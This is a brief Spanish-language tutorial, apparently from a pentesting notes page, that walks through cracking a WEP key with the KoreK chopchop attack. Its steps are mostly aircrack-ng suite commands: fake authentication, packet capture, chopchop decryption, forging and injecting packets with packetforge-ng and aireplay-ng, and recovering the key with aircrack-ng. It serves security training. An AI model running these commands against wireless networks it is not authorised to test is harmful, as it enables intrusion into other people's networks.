Cracking WEP utilizando el Ataque Korek Chopchop
El ataque Chop-Chop es un método utilizado para descifrar paquetes cifrados en redes que usan el protocolo WEP. Este ataque explota vulnerabilidades en la forma en que WEP maneja la verificación de integridad de paquetes. Permite descifrar un paquete capturado, reutilizarlo y generar tráfico en la red, recolectando suficientes IVs (vectores de inicialización) para descifrar la clave WEP.
Paso 1: Asociarse con el punto de acceso
Realiza una falsa autenticación con el punto de acceso para establecer comunicación con él:
aireplay-ng -1 0 -a 00:11:22:33:44:55 -h 66:77:88:99:AA:BB wlan0Paso 2: Capturar un paquete
Usa airodump-ng para capturar tráfico de la red objetivo:
airodump-ng --bssid 00:11:22:33:44:55 --channel 6 -w wep_test wlan0Paso 3: Ejecutar el ataque Chop-Chop
Descifra un paquete capturado usando:
aireplay-ng -4 -b 00:11:22:33:44:55 -h 66:77:88:99:AA:BB wlan0Se genera un archivo cap.
Paso 4: Inyección de paquetes
Crea un paquete modificado:
packetforge-ng -0 -a 00:11:22:33:44:55 -h 66:77:88:99:AA:BB -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-123456.cap -w inject_packet
-k <IP_destino>: La dirección IP de destino del paquete que estás creando. Se usa255.255.255.255para difundirlo a toda la red (dirección de broadcast).-l <IP_origen>: La dirección IP de origen del paquete. También se puede usar255.255.255.255para broadcast.
Inyecta el paquete modificado:
aireplay-ng -2 -r inject_packet wlan0monPaso 5: Recolectar IVs
Continúa recolectando tráfico hasta obtener suficientes IVs:
airodump-ng --bssid 00:11:22:33:44:55 --channel 6 -w wep_test wlan0monPaso 6: Descifrar la clave WEP
Descifra la clave WEP usando los IVs recolectados:
aircrack-ng -b 00:11:22:33:44:55 wep_test.capSi has recolectado suficientes IVs, se mostrará la clave WEP descifrada.
También existe otra forma de hacerlo.
Última actualización